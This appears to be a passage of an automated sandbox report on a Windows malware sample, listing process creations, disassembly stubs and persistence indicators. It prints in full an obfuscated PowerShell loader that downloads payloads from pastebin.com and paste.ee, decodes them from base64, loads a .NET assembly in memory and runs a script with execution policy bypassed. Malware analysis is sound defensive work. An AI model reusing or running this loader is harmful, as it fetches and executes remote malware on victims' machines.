I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?Ho?RgBL?GE?QQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?bgBh?EE?ZwBk?GM?V?BH?Cc?I??7?CQ?SQBl?H??RwBR?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?Ds?J?B3?GU?YgBD?Gw?aQBl?G4?d??g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?FI?VgBV?Fg?dg?g?D0?I??k?Hc?ZQBi?EM?b?Bp?GU?bgB0?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?Ho?RgBL?GE?QQ?g?Ck?I??7?CQ?UgBW?FU?W?B2?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BJ?GU?c?BH?FE?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?Cc?VQBU?EY?O??n?C??LQBm?G8?cgBj?GU?I??7?CQ?UwBU?GY?RwBs?C??PQ?g?Cg?I?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??y?C4?d?B4?HQ?Jw?p?C??Ow?k?F??a?By?Gw?Tg?g?D0?I?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??UwB5?HM?d?Bl?G0?LgBO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?C??Ow?k?F??a?By?Gw?Tg?u?EU?bgBj?G8?Z?Bp?G4?Zw?g?D0?I?Bb?FM?eQBz?HQ?ZQBt?C4?V?Bl?Hg?d??u?EU?bgBj?G8?Z?Bp?G4?ZwBd?Do?OgBV?FQ?Rg?4?C??Ow?k?EQ?S?B6?FU?QQ?g?C??PQ?g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?Ek?ZQBw?Ec?UQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??PQ?g?CQ?U?Bo?HI?b?BO?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?I??k?EQ?S?B6?FU?QQ?g?Ck?I??7?CQ?dQBU?Gw?S?B6?C??f??g?E8?dQB0?C0?RgBp?Gw?ZQ?g?C0?RgBp?Gw?ZQBQ?GE?d?Bo?C??J?BT?FQ?ZgBH?Gw?I??t?GY?bwBy?GM?ZQ?g?Ds?J?BN?E8?R?BS?Gc?I??9?C??I??n?CQ?cgB5?GE?ZQBH?C??PQ?g?Cg?RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??Jw?n?Cc?I??r?C??J?BT?FQ?ZgBH?Gw?I??r?C??Jw?n?Cc?I??t?EU?bgBj?G8?Z?Bp?G4?Zw?g?FU?V?BG?Dg?KQ?7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?EI?eQB0?GU?WwBd?F0?I??k?EY?eQBm?GQ?eg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?HI?eQBh?GU?Rw?u?HI?ZQBw?Gw?YQBj?GU?K??n?Cc?J??k?CQ?J??n?Cc?L??n?Cc?QQ?n?Cc?KQ?g?Ck?I??7?Cc?I??7?CQ?TQBP?EQ?UgBn?C??Kw?9?C??JwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Cc?I??r?C??Jw?6?EM?dQBy?HI?ZQBu?HQ?R?Bv?G0?YQBp?G4?LgBM?G8?YQBk?Cg?I??k?EY?eQBm?GQ?eg?g?Ck?Lg?n?C??Ow?k?E0?TwBE?FI?Zw?g?Cs?PQ?g?Cc?RwBl?HQ?V?B5?H??ZQ?o?C??Jw?n?E0?aQBz?GU?cgBp?GM?bwBy?GQ?aQBv?HM?bwBB?G0?ZQBu?C4?QwBs?GE?cwBz?DE?Jw?n?C??KQ?u?Ec?ZQB0?E0?Jw?g?Ds?J?BN?E8?R?BS?Gc?I??r?D0?I??n?GU?d?Bo?G8?Z??o?C??Jw?n?E0?cwBx?EI?SQBi?Fk?Jw?n?C??KQ?u?Ek?bgB2?G8?awBl?Cg?I??k?G4?dQBs?Gw?I??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?I??n?Cc?M??v?FQ?UgB4?E8?R?Ba?Dk?N??v?HI?LwBl?GU?LgBl?HQ?cwBh?H??Lw?v?Do?cwBw?HQ?d?Bo?Cc?Jw?g?Cw?I??n?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?Cc?I??s?C??Jw?n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/naAgdcTG' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/TRxODZ94/r/ee.etsap//:sptth'' , ''C:\Windows\system32\PURCHASE OKK.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF936862313 pushad ; iretd 7_2_00007FF93686232D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041478D push eax; retf 10_2_004147F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041478D push edx; retn 3E37h10_2_00414818
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041B053 push edx; retf 10_2_0041B067
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00418933 push cs; ret 10_2_00418934
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00414A1A push edx; iretd 10_2_00414A2B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00403350 push eax; ret 10_2_00403352
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00416BEB push edi; ret 10_2_00416BEF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041AD21 push cs; retf 10_2_0041AD29
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0042D6F3 push esi; ret 10_2_0042D7CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0041270E push edx; ret 10_2_0041270F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004147C9 push eax; retf 10_2_004147F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01A409AD push ecx; mov dword ptr [esp], ecx10_2_01A409B6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04DC09AD push ecx; mov dword ptr [esp], ecx12_2_04DC09B6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EEA3A0 push esi; ret 12_2_02EEA479
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ECF3BB push edx; ret 12_2_02ECF3BC
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EC7630 push ss; retf B32Ch12_2_02EC7710
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED55E0 push cs; ret 12_2_02ED55E1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED3898 push edi; ret 12_2_02ED389C
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED79CE push cs; retf 12_2_02ED79D6
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE091F push FFFFFFB6h; retf 12_2_02EE0921
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE0EFB push eax; retf 12_2_02EE0EB1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02EE0E97 push eax; retf 12_2_02EE0EB1
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_02ED7D00 push edx; retf 12_2_02ED7D14
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CE6668 push esp; ret 12_2_04CE66D9
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CE73ED push eax; retf 12_2_04CE73F8
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEBC40 push es; ret 12_2_04CEBC45
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CE4825 push 00000006h; iretd 12_2_04CE4852
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CE5949 push esp; ret 12_2_04CE5954
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CEB937 push cs; iretd 12_2_04CEB938
                  Source: C:\Windows\SysWOW64\iexpress.exeCode function: 12_2_04CF0AE8 push cs; ret 12_2_04CF0AEC

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
